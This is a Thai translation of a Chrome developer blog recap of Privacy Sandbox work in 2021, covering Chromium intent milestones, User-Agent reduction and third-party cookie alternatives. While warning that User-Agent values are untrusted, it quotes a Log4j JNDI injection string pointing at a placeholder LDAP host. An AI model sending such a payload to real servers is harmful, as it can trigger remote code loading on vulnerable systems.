ยินดีต้อนรับสู่ Progress in the Privacy Sandbox ฉบับสรุปปี 2021 การติดตามเหตุการณ์สำคัญในเส้นทางการเลิกใช้คุกกี้ของบุคคลที่สามใน Chrome และการพัฒนาเว็บที่มีความเป็นส่วนตัวมากขึ้น โดยปกติแล้ว เราจะแชร์ภาพรวมการอัปเดตไทม์ไลน์ Privacy Sandbox รวมถึงข่าวสารจากทั่วทั้งโปรเจ็กต์ แต่เดือนธันวาคมเป็นเดือนที่เงียบๆ เราจะย้อนกลับไปดูบางกิจกรรมที่เกิดขึ้นในปี 2021 แทน และระบุวิธีแก้ปัญหาที่เป็นไปได้ซึ่งคุณสามารถทำได้ตอนนี้เลย เรากำลังก้าวเข้าสู่ปีใหม่
ขั้นตอนการพัฒนา Chromium
หากต้องการให้ฟีเจอร์ใหม่ของแพลตฟอร์มเว็บเข้าสู่ Chromium ฟีเจอร์ดังกล่าวจะต้องผ่านกระบวนการพัฒนาแบบเปิดของโปรเจ็กต์ ในปี 2021 ทีม Privacy Sandbox ได้ผลิตสิ่งต่างๆ ต่อไปนี้
| 🥚 | สร้างต้นแบบ | 19 |
| 🧪 | ความตั้งใจในการทดสอบ | 7 |
| 🚀 | ตั้งใจที่จะจัดส่ง | 11 |
ซึ่งแต่ละเป้าหมายถือเป็นการเชิญชวนให้ผู้ใช้ระบบนิเวศบนเว็บในวงกว้างมีส่วนร่วมด้วย
ความตั้งใจในการสร้างต้นแบบเป็นจุดตรวจแรกที่เราจะเชิญชวนให้มีการพูดคุยกันและทำการทดสอบในระยะแรก ซึ่งหมายความว่าข้อเสนอจะมีให้บริการใน GitHub ซึ่งคุณถามคำถามได้โดยสร้างปัญหาหรือเข้าร่วมการสนทนาและการนำเสนอในกลุ่มมาตรฐาน เช่น W3C และ IETF และนี่คือจุดเริ่มต้นของการเขียนโค้ด ซึ่งหมายความว่าคุณคาดหวังให้ฟังก์ชันการทำงานของต้นแบบพร้อมใช้งานสำหรับการทดสอบของนักพัฒนาแอปหลังแฟล็กฟีเจอร์ได้ ความคิดเห็นเบื้องต้นเป็นสิ่งจำเป็นในการตรวจสอบและทำซ้ำข้อเสนอ
ความตั้งใจในการทดสอบเป็นขั้นตอนที่ไม่บังคับในกรณีที่เราต้องการขอช่วงทดลองใช้จากต้นทาง นักพัฒนาซอฟต์แวร์สามารถลงชื่อสมัครช่วงทดลองใช้จากต้นทางของฟีเจอร์ แล้วทดสอบในเวอร์ชันที่ใช้งานจริง วิธีนี้เรียกว่าการทดสอบ เนื่องจากเรามีแง่มุมเฉพาะของฟีเจอร์ที่ต้องการตรวจสอบในสภาพแวดล้อมจริง นักพัฒนาแอปที่สามารถทดสอบและแชร์ผลการทดสอบเหล่านั้นได้แสดงความคิดเห็นที่เป็นประโยชน์เพื่อช่วยในการปรับปรุงและพัฒนาฟีเจอร์นี้
ความตั้งใจที่จะจัดส่งคือเป้าหมายสุดท้ายที่บ่งบอกว่าฟีเจอร์เสร็จสมบูรณ์แล้วและพร้อมสำหรับเวอร์ชันสำหรับผู้ใช้ทั่วไป เมื่อได้รับอนุมัติแล้ว เราจะรวมฟีเจอร์นี้ไว้ในรุ่นที่กำลังจะเผยแพร่ จากนั้นจะใช้เวอร์ชัน Canary, เบต้า และเวอร์ชันเสถียร คุณต้องทดสอบเว็บไซต์กับ Chrome เวอร์ชัน Canary และ เบต้า เพื่อตรวจหาและรายงานข้อบกพร่องก่อนที่ฟีเจอร์ดังกล่าวจะไปถึงเวอร์ชันเสถียร
ข้อเสนอ
ข้อเสนอ Privacy Sandbox แต่ละรายการจะมีที่เก็บ GitHub เพิ่มเข้ามา ที่เก็บมีโฮสต์คำอธิบายเพื่อสรุปฟังก์ชันการทำงานโดยรวม ข้อกำหนดโดยละเอียดสำหรับการนำไปใช้งานตามเบราว์เซอร์ และการสนับสนุนจากทั่วทั้งระบบนิเวศของเว็บในรูปแบบ "ปัญหา" และ "คำขอแบบพุล"
ในที่เก็บ Privacy Sandbox 14 รายการ เรามีสิ่งต่อไปนี้
| 💬 | 545 | สร้างปัญหาแล้ว |
| 250 | ปิดปัญหาแล้ว | |
| 🛠️ | 261 | สร้างคำขอพุลแล้ว |
| 223 | รวมคำขอพุลแล้ว |
ภาษาในวิดีโออธิบายและข้อมูลจำเพาะมักจะมุ่งเป้าไปยังผู้ชมที่คุ้นเคยกับมาตรฐานและการพัฒนาเบราว์เซอร์อยู่แล้ว ซึ่งเป็นเรื่องยากหากคุณไม่คุ้นเคยกับฟีเจอร์นี้ แต่วัตถุประสงค์ของการอธิบายคือ การอธิบาย หากมีประเด็นที่ไม่ชัดเจนหรือไม่ครอบคลุม เราต้องการให้คุณแจ้งปัญหาเพื่อให้เราอัปเดตและชี้แจงคำอธิบายได้
ความละเอียด
การทำความสะอาดแบบฤดูใบไม้ผลิของ User Agent
เมื่อนับเข้าสู่ปีใหม่ เราก็จะนับขึ้นทั้ง Chrome 100 และการลดสตริง User Agent ที่เพิ่มขึ้นด้วย การทำเช่นนี้เป็นแรงจูงใจที่ดีที่จะกลับไปใช้สตริง User Agent ในโค้ดอีกครั้งเพื่อดูว่าได้รับผลกระทบจากการเปลี่ยนแปลงดังกล่าวหรือไม่
วิธีค้นหาพื้นที่เหล่านั้น
- ค้นหา
navigator.userAgentในโค้ด JavaScript หรือเข้าถึงส่วนหัวUser-Agentในโค้ดเซิร์ฟเวอร์ - ตรวจสอบการแยกวิเคราะห์สตริงเพื่อหาสมมติฐานเกี่ยวกับเวอร์ชัน 2 หลัก เช่น ควรแทนที่นิพจน์ทั่วไปที่ระบุ
\d\dหรือ\d{2}ด้วย\d+ - ตรวจสอบการใช้สตริงในทุกที่ที่คุณพึ่งพาสิ่งต่อไปนี้
- เวอร์ชันของแพลตฟอร์ม (ระบบปฏิบัติการ)
- เวอร์ชันบิลด์ทั้งหมดของ Chrome
- ชื่ออุปกรณ์เคลื่อนที่
- ค่าเหล่านี้คือค่าที่จะลดลงเป็นสตริงคงที่ในอนาคต หากต้องการเข้าถึงค่าเหล่านี้ ให้ย้ายข้อมูลไปยังคำแนะนำของไคลเอ็นต์ User-Agent
มีการอัปเดต 1 ธันวาคมที่จะพูดถึง หากคุณนำคำแนะนำด้านไคลเอ็นต์ User Agent ไปใช้ เราได้ส่ง Intent to Ship เพื่อเปิดใช้คำแนะนำในการมอบสิทธิ์ไปยังต้นทางอื่นๆ ใน HTML ผ่านแท็ก <meta> เช่น
<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">
ถ้าชอบทำความสะอาดช่วงฤดูใบไม้ผลิ คุณอาจลองใช้ User Agent แทนได้ด้วย หากคุณใช้สตริงเพื่อตรวจหาอุปกรณ์เคลื่อนที่ ให้ตรวจสอบว่าแทนที่การตั้งค่านี้ด้วยการออกแบบที่ปรับเปลี่ยนตามอุปกรณ์ได้หรือไม่ หากต้องการตรวจสอบชื่อและเวอร์ชันของเบราว์เซอร์สำหรับการสนับสนุนฟีเจอร์ โปรดดูว่าคุณสามารถใช้การตรวจจับฟีเจอร์แทนได้ไหม
โปรดอย่าลืมว่า User Agent เช่น ค่าที่ลูกค้าให้ไว้ ไม่รับประกันความถูกต้องหรือแม้แต่ระบุ ช่องโหว่ Log4j
"Log4j" ล่าสุดแสดงตัวอย่างของความเสี่ยงนี้ ไคลเอ็นต์ที่ตั้งค่าสตริง User Agent ให้รวมค่าอย่าง ${jndi:ldap://example.com/file} อาจสามารถทำให้เว็บไซต์แยกวิเคราะห์บนเซิร์ฟเวอร์ได้
การจัดทำแคตตาล็อกคุกกี้
กิจกรรมช่วงปีใหม่ตามประเพณีอีกอย่างหนึ่งคือ การทำให้แน่ใจว่าคุณมีความสุขที่ได้กินคุกกี้ที่ดีต่อสุขภาพและใช้วัตถุดิบที่มีคุณภาพ ในระหว่างที่เราเริ่มเลิกใช้คุกกี้ของบุคคลที่สาม คุณควรตรวจสอบว่าคุณทราบดีว่าคุกกี้ใดของเว็บไซต์ที่จะได้รับผลกระทบ 2020 เป็นการอัปเดตล่วงหน้าเนื่องจากเราจำเป็นต้องทำเครื่องหมายคุกกี้ทั้งหมดสำหรับการใช้งานแบบข้ามเว็บไซต์หรือของบุคคลที่สามด้วย SameSite=None
คุณจะต้องอัปเดตคุกกี้ที่คุณตั้งค่าแอตทริบิวต์ SameSite เป็น None
มีเส้นทางที่เป็นไปได้ 3 เส้นทางที่ควรพิจารณาในขณะนี้ ดังนี้
- หากต้องใช้คุกกี้เฉพาะในความสัมพันธ์แบบ 1:1 กับเว็บไซต์ระดับบนสุด ให้ทำตามความคืบหน้าของข้อเสนอชิป ซึ่งจะหมายถึงการเพิ่มแอตทริบิวต์
Partitionedลงในคุกกี้ - หากมีการใช้คุกกี้ในบริบทแบบข้ามเว็บไซต์ แต่ใช้ข้ามเว็บไซต์ที่คุณเป็นเจ้าของและเป็นผู้ดำเนินการเท่านั้น คุกกี้ดังกล่าวอาจเป็นตัวเลือกของชุดโดเมนของบุคคลที่หนึ่ง โดยจะต้องกำหนดเว็บไซต์ในชุดและเพิ่มแอตทริบิวต์
SamePartyลงในคุกกี้ - หากมีการใช้คุกกี้เพื่อมอบคุณค่าที่แชร์ร่วมกันบางรูปแบบในหลายๆ เว็บไซต์ ให้ตรวจสอบข้อเสนอ Privacy Sandbox ที่กว้างขึ้นเพื่อหาโซลูชันทางเลือกที่ไม่อาศัยการติดตามข้ามเว็บไซต์
ถ้าคุณรู้สึกว่าใส่ใจสุขภาพเป็นพิเศษ นี่ยังเป็นช่วงเวลาที่เหมาะ ที่จะกลับไปดูการใช้คุกกี้ทั้งหมดอีกครั้ง เนื่องจากเรามีสูตรดีๆ สำหรับปรับปรุงคุกกี้ของบุคคลที่หนึ่งด้วย
ความคิดเห็น
ในขณะที่เรายังคงเผยแพร่การอัปเดตรายเดือนเหล่านี้และดำเนินการผ่าน Privacy Sandbox ในภาพรวมต่อไป เราอยากมั่นใจว่านักพัฒนาซอฟต์แวร์จะได้รับข้อมูลและการสนับสนุนที่จำเป็น แจ้งให้เราทราบทาง @ChromiumDev Twitter หากมีสิ่งใดที่เราสามารถปรับปรุงได้ในซีรีส์นี้ เราจะใช้ข้อมูลที่คุณให้มาใช้ในการปรับปรุงรูปแบบต่อไป
โปรดดูคำถามที่พบบ่อยเกี่ยวกับ Privacy Sandbox ซึ่งเราจะขยายระยะเวลาต่อไปโดยอิงตามปัญหาที่คุณส่งไปยังที่เก็บการสนับสนุนนักพัฒนาแอป หากคุณมีคำถามเกี่ยวกับการทดสอบหรือการใช้งานข้อเสนอใดๆ คุณสามารถติดต่อเราได้